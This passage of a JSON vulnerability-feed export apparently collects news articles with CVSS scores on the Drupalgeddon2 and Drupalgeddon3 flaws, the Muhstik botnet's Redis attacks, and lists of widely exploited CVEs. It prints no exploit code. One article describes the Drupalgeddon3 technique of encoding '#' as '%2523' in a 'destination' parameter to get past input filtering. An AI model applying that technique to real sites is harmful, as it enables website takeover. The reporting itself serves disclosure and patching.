{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-04-14T08:37:13", "id": "THN:B0F0C0035DAAFA1EC62F15464A80677E", "href": "https://thehackernews.com/2018/04/drupal-rce-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:35", "description": "[](<https://thehackernews.com/images/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s728-e100/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it's the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://thehackernews.com/images/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s728-e100/drupal.png>)\n\n \nSince the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. \n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-25T16:41:00", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T11:04:51", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:34", "description": "[](<https://thehackernews.com/images/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s728-e100/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://thehackernews.com/images/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s728-e100/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 resides due to the improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass though stripDangerousValues() function that filters \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. \n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-26T12:32:00", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2018-7602"], "modified": "2018-04-26T12:32:45", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s728-e100/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://thehackernews.com/images/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s728-e100/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://thehackernews.com/images/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s728-e100/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-18T09:49:00", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-18T09:50:03", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) \u2013 Drupal remote code execution vulnerability\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) \u2013 Oracle WebLogic Server remote code execution vulnerability\n * [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) \u2013 An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and\n * [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) \u2013 Apache Log4j remote code execution vulnerability (aka Log4Shell)\n\n\"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force,\" Juniper Threat Labs researchers said in a report published last week.\n\nIn light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T06:59:00", "type": "thn", "title": "Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600", "CVE-2019-2725", "CVE-2021-26084", "CVE-2021-44228", "CVE-2022-0543"], "modified": "2022-03-28T06:59:18", "id": "THN:4DE731C9D113C3993C96A773C079023F", "href": "https://thehackernews.com/2022/03/muhstik-botnet-targeting-redis-servers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese cybersecurity firm [Trend Micro](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/linux-threat-report-2021-1h-linux-threats-in-the-cloud-and-security-recommendations>), detailing the top threats and vulnerabilities affecting the operating system in the first half of 2021, based on data amassed from honeypots, sensors, and anonymized telemetry.\n\nThe company, which detected nearly 15 million malware events aimed at Linux-based cloud environments, found coin miners and ransomware to make up 54% of all malware, with web shells accounting for a 29% share.\n\nIn addition, by dissecting over 50 million events reported from 100,000 unique Linux hosts during the same time period, the researchers found 15 different security weaknesses that are known to be actively exploited in the wild or have a proof of concept (PoC) \u2014\n\n * [**CVE-2017-5638**](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>) (CVSS score: 10.0) - Apache Struts 2 remote code execution (RCE) vulnerability\n * [**CVE-2017-9805**](<https://nvd.nist.gov/vuln/detail/CVE-2017-9805>) (CVSS score: 8.1) - Apache Struts 2 REST plugin XStream RCE vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal Core RCE vulnerability\n * [**CVE-2020-14750**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14750>) (CVSS score: 9.8) - Oracle WebLogic Server RCE vulnerability\n * [**CVE-2020-25213**](<https://nvd.nist.gov/vuln/detail/CVE-2020-25213>) (CVSS score: 10.0) - WordPress File Manager (wp-file-manager) plugin RCE vulnerability\n * [**CVE-2020-17496**](<https://nvd.nist.gov/vuln/detail/CVE-2020-17496>) (CVSS score: 9.8) - vBulletin 'subwidgetConfig' unauthenticated RCE vulnerability\n * [**CVE-2020-11651**](<https://nvd.nist.gov/vuln/detail/CVE-2020-11651>) (CVSS score: 9.8) - SaltStack Salt authorization weakness vulnerability\n * [**CVE-2017-12611**](<https://nvd.nist.gov/vuln/detail/CVE-2017-12611>) (CVSS score: 9.8) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2017-7657**](<https://nvd.nist.gov/vuln/detail/CVE-2017-7657>) (CVSS score: 9.8) - Eclipse Jetty chunk length parsing integer overflow vulnerability\n * [**CVE-2021-29441**](<https://nvd.nist.gov/vuln/detail/CVE-2021-29441>) (CVSS score: 9.8) - Alibaba Nacos AuthFilter authentication bypass vulnerability\n * [**CVE-2020-14179**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14179>) (CVSS score: 5.3) - Atlassian Jira information disclosure vulnerability \n * [**CVE-2013-4547**](<https://nvd.nist.gov/vuln/detail/CVE-2013-4547>) (CVSS score: 8.0) - Nginx crafted URI string handling access restriction bypass vulnerability\n * [**CVE-2019-0230**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0230>) (CVSS score: 9.8) - Apache Struts 2 RCE vulnerability\n * [**CVE-2018-11776**](<https://nvd.nist.gov/vuln/detail/CVE-2018-11776>) (CVSS score: 8.1) - Apache Struts OGNL expression RCE vulnerability\n * [**CVE-2020-7961**](<https://nvd.nist.gov/vuln/detail/CVE-2020-7961>) (CVSS score: 9.8) - Liferay Portal untrusted deserialization vulnerability\n\n[](<https://thehackernews.com/images/-CcxYro041Ss/YSOhRgK85gI/AAAAAAAADmo/EddtTNpqRVsnxWJ2QLdym3CSkEJDwcSggCLcBGAsYHQ/s0/report-1.jpg>)\n\n[](<https://thehackernews.com/images/-p0iNN7yORLk/YSOhRABhMqI/AAAAAAAADmk/RQED6fXWrDkadRhDxqU0JzZOoWwJePPkQCLcBGAsYHQ/s0/report-.jpg>)\n\nEven more troublingly, the 15 most commonly used Docker images on the official Docker Hub repository has been revealed to harbor hundreds of vulnerabilities spanning across python, node, wordpress, golang, nginx, postgres, influxdb, httpd, mysql, debian, memcached, redis, mongo, centos, and rabbitmq, underscoring the need to [secure containers](<https://www.trendmicro.com/vinfo/us/security/news/security-technology/container-security-examining-potential-threats-to-the-container-environment>) from a wide range of potential threats at each stage of the development pipeline.\n\n\"Users and organizations should always apply security best practices, which include utilizing the security by design approach, deploying multilayered virtual patching or vulnerability shielding, employing the principle of least privilege, and adhering to the shared responsibility model,\" the researchers concluded.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-23T13:27:00", "type": "thn", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4547", "CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7657", "CVE-2017-9805", "CVE-2018-11776", "CVE-2018-7600", "CVE-2019-0230", "CVE-2020-11651", "CVE-2020-14179", "CVE-2020-14750", "CVE-2020-17496", "CVE-2020-25213", "CVE-2020-7961", "CVE-2021-29441"], "modified": "2021-08-23T13:27:54", "id": "THN:7FD924637D99697D78D53283817508DA", "href": "https://thehackernews.com/2021/08/top-15-vulnerabilities-attackers.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation 